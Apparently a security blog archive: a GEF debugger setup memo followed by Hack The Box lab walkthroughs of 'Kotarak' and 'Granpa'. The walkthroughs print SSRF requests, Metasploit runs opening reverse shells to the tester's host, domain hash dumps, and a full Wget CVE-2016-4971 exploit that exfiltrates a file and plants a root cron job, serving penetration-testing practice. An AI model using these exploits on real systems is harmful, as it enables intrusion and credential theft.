17 Jan 2020
Explanation
“GDB Enhanced Features(GEF) ” is a GDB extension to provide additional commands for dynamic analysis and exploit development.
To setup for Kali linux, we need some steps and this is a memo for that.
Environment
OS: Kali linux 2019.4
GDB: gdb (Debian 8.3.1-1) 8.3.1
Solution
1. Initial Setup
On the Github repository, we have some Explanation for installation.
However, they didn’t work and the following script achieves the purpose.
root@kali:~# git clone https://github.com/hugsy/gef.git
---
root@kali:~# echo source ` pwd ` /gef/gef.py >> ~/.gdbinit
With the following command, we can confirm the GEF running.
However, we still have some missing commands.
root@kali:~# gdb -q test
GEF for linux ready, type ` gef' to start, `gef config' to configure
77 commands loaded for GDB 8.3.1 using Python engine 3.7
[ * ] 3 commands could not be loaded, run ` gef missing` to know why.
Reading symbols from test...
( No debugging symbols found in test )
gef➤
With the command “gef missing”, we can find the names of command missing.
gef➤ gef missing
[ * ] Command ` set-permission` is missing, reason → Missing ` keystone-engine` package for Python3, install with: ` pip3 install keystone-engine` .
[ * ] Command ` ropper` is missing, reason → Missing ` ropper` package for Python3, install with: ` pip3 install ropper` .
[ * ] Command ` assemble` is missing, reason → Missing ` keystone-engine` package for Python3, install with: ` pip3 install keystone-engine` .
gef➤
Then, install the prerequisites.
root@kali:~# apt-get install cmake
---
root@kali:~# pip3 install keystone-engine ropper unicorn
---
However, still some commands are missing.
gef➤ gef missing
[ * ] Command ` set-permission` is missing, reason → Missing ` keystone-engine` package for Python3, install with: ` pip3 install keystone-engine` .
[ * ] Command ` assemble` is missing, reason → Missing ` keystone-engine` package for Python3, install with: ` pip3 install keystone-engine` .
gef➤
This time, we need to build the “keystone” manually.
The source code can be downloaded from the release page of official repository .
root@kali:~# ls -l | grep keystone
-rw-r--r-- 1 root root 4326151 Jan 17 02:30 keystone-0.9.1.tar.gz
root@kali:~# tar xzvf keystone-0.9.1.tar.gz
---
root@kali:~# cd keystone-0.9.1/
root@kali:~/keystone-0.9.1# mkdir build
root@kali:~/keystone-0.9.1# cd build/
root@kali:~/keystone-0.9.1/build# ../make-share.sh
---
root@kali:~/keystone-0.9.1/build# make install
---
root@kali:~/keystone-0.9.1/build# ldconfig
After that, we can confirm that we have no missing commands.
root@kali:~/keystone-0.9.1/build# gdb -q test
GEF for linux ready, type ` gef' to start, `gef config' to configure
80 commands loaded for GDB 8.3.1 using Python engine 3.7
Reading symbols from test...
( No debugging symbols found in test )
gef➤ gef missing
[ +] No missing command
gef➤
14 Jan 2020
Retired date: 2018/03/10
Explanation
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
For the practice, solve the left boxes in the list of OSCP like boxes and this is a walkthrough of a box “Kotarak”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.55 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-14 00:42 EET
Nmap scan report for 10.10.10.55
Host is up ( 0.045s latency) .
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 ( Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 ( RSA)
| 256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 ( ECDSA)
|_ 256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 ( ED25519)
8009/tcp open ajp13 Apache Jserv ( Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE OPTIONS
| Potentially risky methods: PUT DELETE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open http Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-title: Apache Tomcat/8.5.5 - Error report
60000/tcp open http Apache httpd 2.4.18 (( Ubuntu))
|_http-server-header: Apache/2.4.18 ( Ubuntu)
|_http-title: Kotarak Web Hosting
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done : 1 IP address ( 1 host up) scanned in 75.28 seconds
root@kali:~#
Gobuster port 8080:
root@kali:~# gobuster dir -u http://10.10.10.55:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt -s '200,204,301,302,403'
===============================================================
Gobuster v3.0.1
by OJ Reeves ( @TheColonial) & Christian Mehlmauer ( @_FireFart_)
===============================================================
[ +] Url: http://10.10.10.55:8080/
[ +] Threads: 10
[ +] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[ +] Status codes: 200,204,301,302,403
[ +] User Agent: gobuster/3.0.1
[ +] Extensions: html,php,txt
[ +] Timeout: 10s
===============================================================
2020/01/14 01:55:44 Starting gobuster
===============================================================
/docs ( Status: 302)
/examples ( Status: 302)
/manager ( Status: 302)
/RELEASE-NOTES.txt ( Status: 200)
===============================================================
2020/01/14 03:01:44 Finished
===============================================================
root@kali:~#
Gobuster port 60000:
root@kali:~# gobuster dir -u http://10.10.10.55:60000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt -s '200,204,301,302,403'
===============================================================
Gobuster v3.0.1
by OJ Reeves ( @TheColonial) & Christian Mehlmauer ( @_FireFart_)
===============================================================
[ +] Url: http://10.10.10.55:60000/
[ +] Threads: 10
[ +] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[ +] Status codes: 200,204,301,302,403
[ +] User Agent: gobuster/3.0.1
[ +] Extensions: txt,html,php
[ +] Timeout: 10s
===============================================================
2020/01/14 00:46:42 Starting gobuster
===============================================================
/info.php ( Status: 200)
/index.php ( Status: 200)
/url.php ( Status: 200)
/server-status ( Status: 403)
===============================================================
2020/01/14 01:52:27 Finished
===============================================================
root@kali:~#
2. Getting User
We have 2 interesting services.
On the port 8080, we have Tomcat and on the port 60000, we can find a “Private Browser”.
By adding a parameter, we can view the prohibited web pages of Kotarak like “server-status”.
Meaning, this web application has a SSRF (Server Side Request Forgery) vulnerability and an attacker can view the hidden services.
The interesting point is that “Kotarak” has a running service on “127.0.0.1:888”.
Request to see “http://10.10.10.55:60000”:
http://10.10.10.55:60000/url.php?path= http://localhost:60000/server-status
Then,take a look at “127.0.0.1:888” by sending the following request to the native web browser.
Request to see “http://10.10.10.55:8888”:
http://10.10.10.55:60000/url.php?path= http://localhost:888
To go to each hyperlink, sounds we need to add “?doc=backup” parameter.
So, “http://localhost:888/?doc=backup” is the appropriate URL to access to these links.
root@kali:~# curl -s http://10.10.10.55:60000/url.php?path= http://localhost:888 | grep backup
<td width = "27" > <a href = "?doc=backup" class = "tableElement" > <img src = "inc/images/generic.png" alt = "dir" width = "22" height = "22" border = "0" > </a></td>
<td class = "tableElement" > <a href = "?doc=backup" class = "tableElement" > backup</a></td>
root@kali:~#
Then, try to access the “backup” file on the port 888.
Sounds it’s empty page but by taking a look at source code, we can find a hidden credential.
root@kali:~# curl -s http://10.10.10.55:60000/url.php?path= localhost:888/?doc= backup | grep password
you must define such a user - the username and password are arbitrary. It is
them. You will also need to set the passwords to something appropriate.
<user username = "tomcat" password = "<must-be-changed>" roles = "tomcat" />
<user username = "both" password = "<must-be-changed>" roles = "tomcat,role1" />
<user username = "role1" password = "<must-be-changed>" roles = "role1" />
<user username = "admin" password = "3@g01PdhB!" roles = "manager,manager-gui,admin-gui,manager-script" />
root@kali:~#
By going to “http://10.10.10.55:8080/manager/html” and try some possible password combination,
we can figure out the following credential is available for tomcat.
admin:3@g01PdhB!
Since we have an exploit for tomcat, take advantage of the credential and get the user shell of “tomcat”.
msf5 > use exploit/multi/http/tomcat_mgr_upload
msf5 exploit( multi/http/tomcat_mgr_upload) > set httpusername admin
httpusername => admin
msf5 exploit( multi/http/tomcat_mgr_upload) > set httppassword 3@g01PdhB!
httppassword => 3@g01PdhB!
msf5 exploit( multi/http/tomcat_mgr_upload) > set rhost 10.10.10.55
rhost => 10.10.10.55
msf5 exploit( multi/http/tomcat_mgr_upload) > set rport 8080
rport => 8080
msf5 exploit( multi/http/tomcat_mgr_upload) > run
[ * ] Started reverse TCP handler on 10.10.14.36:4444
[ * ] Retrieving session ID and CSRF token...
[ * ] Uploading and deploying 63aGm6...
[ * ] Executing 63aGm6...
[ * ] Undeploying 63aGm6 ...
[ * ] Sending stage ( 53906 bytes) to 10.10.10.55
[ * ] Meterpreter session 1 opened ( 10.10.14.36:4444 -> 10.10.10.55:53600) at 2020-01-14 14:53:18 +0200
meterpreter > getuid
Server username: tomcat
meterpreter >
It is still not possible to get the “user.txt”.
However, we can get some Interesting files.
meterpreter > pwd
/home/tomcat/to_archive/pentest_data
meterpreter > ls
Listing: /home/tomcat/to_archive/pentest_data
=============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 16793600 fil 2017-07-21 19:16:23 +0300 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
100666/rw-rw-rw- 12189696 fil 2017-07-21 19:16:45 +0300 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
meterpreter >
We can download these files by “download” command of meterpreter shell.
meterpreter > download 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
---
meterpreter > download 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
These files look like NTDS file for database of Active directory.
.dit stands for “Directory Information Tree” and the hierarchy of network objects and access permissiona are saved.
To confirm what are these files, we can use “file” command.
root@kali:~# file 2017072111463*
20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit: Extensible storage engine DataBase, version 0x620, checksum 0x16d44752, page size 8192, DirtyShutdown, Windows version 6.1
20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin: MS Windows registry file, NT/2000 or above
root@kali:~#
Since we had a NTDS file and system hive, we can extract the password hash of the users.
We can refer this article for the additional information.
root@kali:~# impacket-secretsdump -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit LOCAL
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[ * ] Target system bootKey: 0x14b6fb98fedc8e15107867c4722d1399
[ * ] Dumping Domain Credentials ( domain\u id :rid:lmhash:nthash)
[ * ] Searching for pekList, be patient
[ * ] PEK # 0 found and decrypted: d77ec2af971436bccb3b6fc4a969d7ff
[ * ] Reading and decrypting hashes from 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$: 1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$: 1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$: 1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$: 1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$: 1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[ * ] Kerberos keys from 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
Administrator:aes256-cts-hmac-sha1-96:6c53b16d11a496d0535959885ea7c79c04945889028704e2a4d1ca171e4374e2
Administrator:aes128-cts-hmac-sha1-96:e2a25474aa9eb0e1525d0f50233c0274
Administrator:des-cbc-md5:75375eda54757c2f
WIN-3G2B0H151AC$: aes256-cts-hmac-sha1-96:84e3d886fe1a81ed415d36f438c036715fd8c9e67edbd866519a2358f9897233
WIN-3G2B0H151AC$: aes128-cts-hmac-sha1-96:e1a487ca8937b21268e8b3c41c0e4a74
WIN-3G2B0H151AC$: des-cbc-md5:b39dc12a920457d5
WIN-3G2B0H151AC$: rc4_hmac:668d49ebfdb70aeee8bcaeac9e3e66fd
krbtgt:aes256-cts-hmac-sha1-96:14134e1da577c7162acb1e01ea750a9da9b9b717f78d7ca6a5c95febe09b35b8
krbtgt:aes128-cts-hmac-sha1-96:8b96c9c8ea354109b951bfa3f3aa4593
krbtgt:des-cbc-md5:10ef08047a862046
krbtgt:rc4_hmac:ca1ccefcb525db49828fbb9d68298eee
WIN2K8$: aes256-cts-hmac-sha1-96:289dd4c7e01818f179a977fd1e35c0d34b22456b1c8f844f34d11b63168637c5
WIN2K8$: aes128-cts-hmac-sha1-96:deb0ee067658c075ea7eaef27a605908
WIN2K8$: des-cbc-md5:d352a8d3a7a7380b
WIN2K8$: rc4_hmac:160f6c1db2ce0994c19c46a349611487
WINXP1$: aes256-cts-hmac-sha1-96:347a128a1f9a71de4c52b09d94ad374ac173bd644c20d5e76f31b85e43376d14
WINXP1$: aes128-cts-hmac-sha1-96:0e4c937f9f35576756a6001b0af04ded
WINXP1$: des-cbc-md5:984a40d5f4a815f2
WINXP1$: rc4_hmac:6f5e87fd20d1d8753896f6c9cb316279
WIN2K31$: aes256-cts-hmac-sha1-96:f486b86bda928707e327faf7c752cba5bd1fcb42c3483c404be0424f6a5c9f16
WIN2K31$: aes128-cts-hmac-sha1-96:1aae3545508cfda2725c8f9832a1a734
WIN2K31$: des-cbc-md5:4cbf2ad3c4f75b01
WIN2K31$: rc4_hmac:cdd7a7f43d06b3a91705900a592f3772
WIN7$: aes256-cts-hmac-sha1-96:b9921a50152944b5849c706b584f108f9b93127f259b179afc207d2b46de6f42
WIN7$: aes128-cts-hmac-sha1-96:40207f6ef31d6f50065d2f2ddb61a9e7
WIN7$: des-cbc-md5:89a1673723ad9180
WIN7$: rc4_hmac:24473180acbcc5f7d2731abe05cfa88c
atanas:aes256-cts-hmac-sha1-96:933a05beca1abd1a1a47d70b23122c55de2fedfc855d94d543152239dd840ce2
atanas:aes128-cts-hmac-sha1-96:d1db0c62335c9ae2508ee1d23d6efca4
atanas:des-cbc-md5:6b80e391f113542a
[ * ] Cleaning up...
root@kali:~#
We can crack some of the hashes by using CrackStation
Now we had the following credentials.
admin:f16tomcat!
atanas:Password123!
Then, move to the user “atanas”.
This time, the following credential worked.
atanas:f16tomcat!
meterpreter > execute -i -f /bin/bash
Process 3 created.
Channel 3 created.
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat@kotarak-dmz:/$ su atanas
su atanas
Password: f16tomcat!
atanas@kotarak-dmz:/$
“user.txt” is in the directory “/home/atanas”.
atanas@kotarak-dmz:~$ pwd
pwd
/home/atanas
atanas@kotarak-dmz:~$ cat user.txt
cat user.txt
93f844f50491ef797c9c1b601b4bece8
atanas@kotarak-dmz:~$
3. Getting Root
Even though “atanas” is a general user, we can take a look at the “/root” directory as “atanas”.
In that directory, we have 2 interesting files “flag.txt” and “app.log”.
flag.txt:
atanas@kotarak-dmz:/root$ cat flag.txt
cat flag.txt
Getting closer! But what you are looking for can't be found here.
atanas@kotarak-dmz:/root$
app.log:
atanas@kotarak-dmz:/root$ cat app.log
cat app.log
10.0.3.133 - - [ 20/Jul/2017:22:48:01 -0400 ] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [ 20/Jul/2017:22:50:01 -0400 ] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [ 20/Jul/2017:22:52:01 -0400 ] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
atanas@kotarak-dmz:/root$
Sounds “10.0.3.133” is continuously sending GET request to this host with Wget 1.16.
By googling like following,
we can find a vulnerability GNU Wget 1.18 - Arbitrary File Upload / Remote Code Execution .
wget 1.16 vulnerability
According to the vulnerability description, we have to create a .wgetrc file.
root@kali:~# cat .wgetrc
post_file = /root/root.txt
output_document = /etc/cron.d/wget-root-shell
root@kali:~#
After that, install pyftpdlib and launch the FTP server with the following command.
root@kali:~# pip install pyftpdlib
---
root@kali:~# python -m pyftpdlib -p 21 -w
/usr/local/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
RuntimeWarning)
[ I 2020-01-14 18:13:11] >>> starting FTP server on 0.0.0.0:21, pid = 111918 <<<
[ I 2020-01-14 18:13:11] concurrency model: async
[ I 2020-01-14 18:13:11] masquerade ( NAT) address: None
[ I 2020-01-14 18:13:11] passive ports: None
Also, according to the description, we need a python script “wget-exploit.py”
root@kali:~# cat wget-exploit.py
#!/usr/bin/env python
#
# Wget 1.18 < Arbitrary File Upload Exploit
# Dawid Golunski
# dawid( at )legalhackers.com
#
# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
#
# CVE-2016-4971
#
import SimpleHTTPServer
import SocketServer
import socket;
class wgetExploit( SimpleHTTPServer.SimpleHTTPRequestHandler) :
def do_GET( self) :
# This takes care of sending .wgetrc
print "We have a volunteer requesting " + self.path + " by GET :) \n "
if "Wget" not in self.headers.getheader( 'User-Agent' ) :
print "But it's not a Wget :( \n "
self.send_response( 200)
self.end_headers()
self.wfile.write( "Nothing to see here..." )
return
print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n "
self.send_response( 301)
new_path = '%s' %( 'ftp://anonymous@%s:%s/.wgetrc' %( FTP_HOST, FTP_PORT) )
print "Sending redirect to %s \n " %( new_path)
self.send_header( 'Location' , new_path)
self.end_headers()
def do_POST( self) :
# In here we will receive extracted file and install a PoC cronjob
print "We have a volunteer requesting " + self.path + " by POST :) \n "
if "Wget" not in self.headers.getheader( 'User-Agent' ) :
print "But it's not a Wget :( \n "
self.send_response( 200)
self.end_headers()
self.wfile.write( "Nothing to see here..." )
return
content_len = int( self.headers.getheader( 'content-length' , 0))
post_body = self.rfile.read( content_len)
print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n ---[begin]--- \n %s \n ---[eof]--- \n\n " % ( post_body)
print "Sending back a cronjob script as a thank-you for the file..."
print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
self.send_response( 200)
self.send_header( 'Content-type' , 'text/plain' )
self.end_headers()
self.wfile.write( ROOT_CRON)
print " \n File was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n "
return
HTTP_LISTEN_IP = '192.168.57.1'
HTTP_LISTEN_PORT = 80
FTP_HOST = '192.168.57.1'
FTP_PORT = 21
ROOT_CRON = "* * * * * root /usr/bin/id > /root/hacked-via-wget \n "
handler = SocketServer.TCPServer(( HTTP_LISTEN_IP, HTTP_LISTEN_PORT) , wgetExploit)
print "Ready? Is your FTP server running?"
sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex(( FTP_HOST, FTP_PORT))
if result == 0:
print "FTP found open on %s:%s. Let's go then \n " % ( FTP_HOST, FTP_PORT)
else :
print "FTP is down :( Exiting."
exit ( 1)
print "Serving wget exploit on port %s... \n\n " % HTTP_LISTEN_PORT
handler.serve_forever()
However, the above script is just an example and we have to modify the following points of the script.
root@kali:~# cat -n wget-exploit.py | head -n 65 | tail -n 4
62 HTTP_LISTEN_IP = ''
63 HTTP_LISTEN_PORT = 80
64 FTP_HOST = '10.10.14.36'
65 FTP_PORT = 21
Then, go to a directory that we have write permission on the “Kotarak”.
Upload the python script “wget-exploit.py”.
meterpreter > pwd
/tmp
meterpreter > upload ./wget-exploit.py
[ * ] uploading : ./wget-exploit.py -> wget-exploit.py
[ * ] Uploaded -1 .00 B of 2.77 KiB ( -0 .04%) : ./wget-exploit.py -> wget-exploit.py
[ * ] uploaded : ./wget-exploit.py -> wget-exploit.py
meterpreter >
Generally, we can’t use the port 80 as a general user.
But, we can obtain the purpose by using “authbind” command.
In the POST request, we can see the content of “root.txt”.
atanas@kotarak-dmz:/tmp$ authbind --deep python wget-exploit.py
authbind --deep python wget-exploit.py
Ready? Is your FTP server running?
FTP found open on 10.10.14.36:21. Let's go then
Serving wget exploit on port 80...
We have a volunteer requesting /archive.tar.gz by GET :)
Uploading .wgetrc via ftp redirect vuln. It should land in /root
10.0.3.133 - - [14/Jan/2020 12:12:01] "GET /archive.tar.gz HTTP/1.1" 301 -
Sending redirect to ftp://anonymous@10.10.14.36:21/.wgetrc
We have a volunteer requesting /archive.tar.gz by POST :)
Received POST from wget, this should be the extracted /etc/shadow file:
---[begin]---
950d1425795dfd38272c93ccbb63ae2c
---[eof]---
Sending back a cronjob script as a thank-you for the file...
It should get saved in /etc/cron.d/wget-root-shell on the victim' s host ( because of .wgetrc we injected in the GET first response)
10.0.3.133 - - [ 14/Jan/2020 12:14:01] "POST /archive.tar.gz HTTP/1.1" 200 -
File was served. Check on /root/hacked-via-wget on the victim's host in a minute! :)
Output of python local FTP server:
root@kali:~# python -m pyftpdlib -p 21 -w
/usr/local/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
RuntimeWarning)
[ I 2020-01-14 19:06:59] >>> starting FTP server on 0.0.0.0:21, pid = 115096 <<<
[ I 2020-01-14 19:06:59] concurrency model: async
[ I 2020-01-14 19:06:59] masquerade ( NAT) address: None
[ I 2020-01-14 19:06:59] passive ports: None
[ I 2020-01-14 19:07:11] 10.10.10.55:54274-[] FTP session opened ( connect)
[ I 2020-01-14 19:08:35] 10.10.10.55:50788-[] FTP session opened ( connect)
[ I 2020-01-14 19:08:35] 10.10.10.55:50788-[anonymous] USER 'anonymous' logged in .
[ I 2020-01-14 19:08:35] 10.10.10.55:50788-[anonymous] RETR /root/.wgetrc completed = 1 bytes = 73 seconds = 0.002
[ I 2020-01-14 19:08:35] 10.10.10.55:50788-[anonymous] FTP session closed ( disconnect) .
12 Jan 2020
Retired date: 2017/07/07
Explanation
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
For the practice, solve the left boxes in the list of OSCP like boxes and this is a walkthrough of a box “Granpa” and we can use same technique for “Granny” also.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.14 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-11 15:15 EET
Nmap scan report for 10.10.10.14
Host is up ( 0.044s latency) .
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| WebDAV type : Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
|_ Server Date: Sat, 11 Jan 2020 13:21:06 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done : 1 IP address ( 1 host up) scanned in 113.63 seconds
root@kali:~#
2. Getting User
Nmap revealed only one service, Microsoft IIS version 6 with WebDAV running on the IIS server.
Then, google following keyword.
webdav iis 6 exploit
We can find an exploit “Microsoft IIS 6.0 - WebDAV ‘ScStoragePathFromUrl’” .
Also, searchsploit can find the same vulnerability with the following way.
root@kali:~# searchsploit iis 6 webdav
------------------------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| ( /usr/share/exploitdb/)
------------------------------------------------------------------------------------------ ----------------------------------------
Microsoft IIS - WebDAV Write Access Code Execution ( Metasploit) | exploits/windows/remote/16471.rb
Microsoft IIS 5.0 ( Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow ( 1 | exploits/windows/remote/22365.pl
Microsoft IIS 5.0 ( Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow ( 2 | exploits/windows/remote/22366.c
Microsoft IIS 5.0 ( Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow ( 3 | exploits/windows/remote/22367.txt
Microsoft IIS 5.0 ( Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow ( 4 | exploits/windows/remote/22368.txt
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow ( MS03-007) ( Metasploit) | exploits/windows/remote/16470.rb
Microsoft IIS 5.0 - WebDAV Denial of Service | exploits/windows/dos/20664.pl
Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service | exploits/windows/dos/22670.c
Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure | exploits/windows/remote/26230.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass ( 1) | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass ( 2) | exploits/windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass ( PHP) | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass ( Patch) | exploits/windows/remote/8754.patch
------------------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
root@kali:~#
By the following way, we can exploit the vulnerability with Metasploit.
Now we got a shell as user “authority\network service”.
However, in this time, it’s not possible to achieve “user.txt”.
msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf5 exploit( windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
rhosts => 10.10.10.14
msf5 exploit( windows/iis/iis_webdav_scstoragepathfromurl) > run
[ * ] Started reverse TCP handler on 10.10.14.36:4444
[ * ] Trying path length 3 to 60 ...
[ * ] Sending stage ( 180291 bytes) to 10.10.10.14
[ * ] Meterpreter session 1 opened ( 10.10.14.36:4444 -> 10.10.10.14:1031) at 2020-01-11 15:49:29 +0200
meterpreter > shell
[ -] Failed to spawn shell with thread impersonation. Retrying without it.
Process 2112 created.
Channel 2 created.
Microsoft Windows [ Version 5.2.3790]
( C) Copyright 1985-2003 Microsoft Corp.
c:\D ocuments and settings>whoami
whoami
nt authority\n etwork service
c:\D ocuments and settings>
3. Getting Root
Since “nt authority\network service” has less permission than ordinary users, we can not use some common commands here.
meterpreter > getuid
[ -] stdapi_sys_config_getuid: Operation failed: Access is denied.
meterpreter >
Before getting SYSTEM shell, we need to achieve another process having better permission.
This time, we cab migrate to the process “notepad.txt”.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [ System Process]
4 0 System
272 4 smss.exe
324 272 csrss.exe
348 272 winlogon.exe
396 348 services.exe
400 616 wmiprvse.exe x86 0 NT AUTHORITY\N ETWORK SERVICE C:\W INDOWS\s ystem32\w bem\w miprvse.exe
408 348 lsass.exe
616 396 svchost.exe
684 396 svchost.exe
740 396 svchost.exe
768 396 svchost.exe
804 396 svchost.exe
940 396 spoolsv.exe
968 396 msdtc.exe
1080 396 cisvc.exe
1124 396 svchost.exe
1132 1080 cidaemon.exe
1184 396 inetinfo.exe
1220 396 svchost.exe
1332 396 VGAuthService.exe
1412 396 vmtoolsd.exe
1460 396 svchost.exe
1600 396 svchost.exe
1708 396 alg.exe
1816 616 wmiprvse.exe x86 0 \D evice\H arddiskVolume1\W INDOWS\s ystem32\w bem\w miprvse.exe
1920 396 dllhost.exe
2180 1460 w3wp.exe x86 0 NT AUTHORITY\N ETWORK SERVICE c:\w indows\s ystem32\i netsrv\w 3wp.exe
2248 616 davcdata.exe x86 0 NT AUTHORITY\N ETWORK SERVICE C:\W INDOWS\s ystem32\i netsrv\d avcdata.exe
2328 1080 cidaemon.exe
2356 1080 cidaemon.exe
2492 616 wmiprvse.exe
2872 1816 notepad.exe x86 0 NT AUTHORITY\N ETWORK SERVICE C:\W INDOWS\s ystem32\n otepad.exe
2972 348 logon.scr
3560 1460 w3wp.exe
3744 2180 rundll32.exe x86 0 C:\W INDOWS\s ystem32\r undll32.exe
meterpreter > migrate 2872
[ * ] Migrating from 3744 to 2872...
[ * ] Migration completed successfully.
meterpreter >
To find out a vulnerability, we can use the Metasploit module “local_exploit_suggester”.
meterpreter > background
[ * ] Backgrounding session 1...
msf5 exploit( windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf5 post( multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post( multi/recon/local_exploit_suggester) > run
[ * ] 10.10.10.14 - Collecting local exploits for x86/windows...
[ * ] 10.10.10.14 - 29 exploit checks are being tried...
[ +] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[ +] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[ +] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[ +] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[ +] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[ +] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
